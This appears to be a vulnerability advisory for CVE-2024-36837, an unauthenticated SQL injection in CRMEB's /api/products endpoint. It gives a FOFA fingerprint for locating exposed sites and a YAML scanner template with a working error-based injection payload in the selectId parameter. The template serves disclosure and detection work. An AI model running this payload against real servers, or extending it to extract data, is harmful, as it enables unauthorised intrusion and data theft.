CVE-2024-36837: CRMEB open-source e-commerce system /api/products SQL injection vulnerability (CVE-2024-36837)

Date: 2025-09-01 | Affected software: CRMEB | PoC: public

Vulnerability description

FOFA fingerprint: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

The /api/products endpoint passes the selectId query parameter into a SQL query without sanitisation, allowing SQL injection through a plain GET request. The PoC below uses an error-based technique (GTID_SUBSET() applied to a CONCAT() string) so that the result of the injected subquery is reflected in the database error message. The injection can disclose sensitive information and the absolute path of the backend web root, and further exploitation can lead to control of the server. The vulnerability requires no preconditions and is simple to exploit.

PoC code [public]

id: CVE-2024-36837

info:
  name: CRMEB open-source e-commerce system /api/products SQL injection vulnerability (CVE-2024-36837)
  author: fkalis
  severity: high
  description: |-
    fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
    The /api/products endpoint passes the selectId parameter into a SQL query unsanitised, allowing SQL injection that can disclose sensitive information and the absolute path of the backend web root; further exploitation can yield server access. No preconditions are required and exploitation is simple.
  reference:
    - https://www.seebug.org/vuldb/ssvid-99852
    - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/CVE-2024-36837%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md
  tags: crmeb,sqli,cve,cve2024
  created: 2024/12/25

rules:
  r0:
    request:
      method: GET
      # Error-based probe: MySQL evaluates md5(123123) inside the subquery and the
      # result is leaked through the GTID_SUBSET() "Malformed GTID set specification" error text
      path: /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(123123)))),0x7e),3550)
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    # 4297f44b13955235245b2497399d7a93 is md5("123123"); seeing it in the body proves the injected subquery ran
    expression: response.status == 200 && response.body.bcontains(b'4297f44b13955235245b2497399d7a93')
expression: r0()
